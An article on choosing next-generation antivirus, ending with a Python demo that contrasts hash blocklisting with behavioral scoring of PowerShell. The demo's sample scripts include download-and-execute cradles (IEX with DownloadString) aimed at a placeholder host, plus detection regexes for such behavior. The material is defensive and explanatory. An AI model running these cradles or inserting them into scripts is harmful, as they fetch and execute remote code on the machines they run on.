Modern attacks take multiple shapes and require advanced defense strategies. While legacy antivirus solutions are still needed to block the tens of thousands of malware and ransomware strains that are out there, there is a critical need to move beyond traditional antivirus.
A new breed of software called next-generation antivirus (NGAV) was developed to meet that need. These products use a variety of new technologies, including machine learning and artificial intelligence (AI), to identify and block malicious activity based on its behavior. Here are five important points to consider when evaluating an NGAV product:
Traditional antivirus software tends to have a relatively low rate of false positives because it was built to identify malware that was previously defined as malicious based on indicators of compromise such as hashes, signatures, IPs, domains and URLs.
In contrast, NGAV software attempts to identify never-before-seen malware and protect against it. This is a harder, less definitive task that tends to generate a high volume of false positives.
When testing NGAV, go beyond the malware provided by the NGAV vendor and check the configuration to assess the product's real-life false positive rate.
While a certain volume of false alerts is manageable, excessive false positives often cause alert fatigue and push security teams to shut down noisy detection mechanisms, which may lead to them missing critical alerts.
An effective NGAV employs advanced machine learning, data analysis and AI to identify new attack methodologies, define them as malicious and protect against them. When possible, it is highly recommended to test the abilities of the considered tool against a set of advanced threats.
Ransomware has a different set of behaviors compared to other types of malware. Chiefly, it encrypts as much data as possible as quickly as it can and then makes its presence known. It is critical for an NGAV solution to use effective mechanisms to protect against new ransomware strains, including ones that encrypt the Master Boot Record, such as NotPetya.
We estimate that about half of today's attacks use malware-free or fileless techniques. These attacks use scripting and management technologies native to Windows, such as WMI and PowerShell, to perform malicious activities. Since WMI and PowerShell are heavily used by IT admins in their daily duties, avoid any NGAV solution that takes a blacklisting/whitelisting approach. Whitelisting PowerShell activity is a very time-consuming process. Instead, an NGAV product should inspect the script itself and be able to determine whether it is malicious.
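As an added illustration of this last point (example code written for this article, not any vendor's product), the snippet below contrasts a hash blocklist, which misses a trivially altered copy of a known-bad script, with a small content-based scoring rule set that flags the same behavior while leaving an ordinary admin script alone. The sample PowerShell one-liners, rule weights and threshold are constructed for the demonstration and are not tuned for production use.

```python
import hashlib
import re

# Constructed sample scripts (hostnames are placeholders, not real indicators).
BENIGN_ADMIN_SCRIPT = (
    "Get-WmiObject Win32_Service | Where-Object { $_.State -eq 'Stopped' } "
    "| Format-Table Name, StartMode"
)
BENIGN_DOWNLOAD_SCRIPT = (
    "Invoke-WebRequest -Uri 'https://example.invalid/agent.msi' -OutFile C:\\Temp\\agent.msi"
)
KNOWN_BAD_SCRIPT = (
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/payload.ps1')"
)
# Same behavior as KNOWN_BAD_SCRIPT, but casing and parentheses differ, so the hash changes.
VARIANT_SCRIPT = (
    "iex ((New-Object Net.WebClient).downloadstring('http://example.invalid/p.ps1'))"
)


def sha256(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


# Legacy approach: block only what has been seen before, keyed by exact hash.
KNOWN_BAD_HASHES = {sha256(KNOWN_BAD_SCRIPT)}


def hash_blocklist_verdict(script: str) -> bool:
    """True if the script's hash is on the blocklist (exact match only)."""
    return sha256(script) in KNOWN_BAD_HASHES


# Behavioral approach: score what the script does, regardless of its exact bytes.
# Weights and the threshold are illustrative assumptions; real products learn them.
BEHAVIOR_RULES = [
    (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 3, "dynamic code execution"),
    (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I), 2, "remote content fetch"),
    (re.compile(r"-(enc|encodedcommand)\b", re.I), 2, "encoded command line"),
    (re.compile(r"-(nop|noprofile)\b|-w(indowstyle)?\s+hidden", re.I), 1, "evasion switches"),
]
MALICIOUS_THRESHOLD = 4  # a fetch alone (2) stays below it, fetch + execute (5) crosses it


def behavior_verdict(script: str) -> tuple[int, list[str]]:
    """Return (score, matched rule names); score >= MALICIOUS_THRESHOLD means block."""
    score, reasons = 0, []
    for pattern, weight, name in BEHAVIOR_RULES:
        if pattern.search(script):
            score += weight
            reasons.append(name)
    return score, reasons
```

Lowering the threshold to 2 would catch nothing extra here but would start flagging the benign installer download, which is exactly the false-positive trade-off described above.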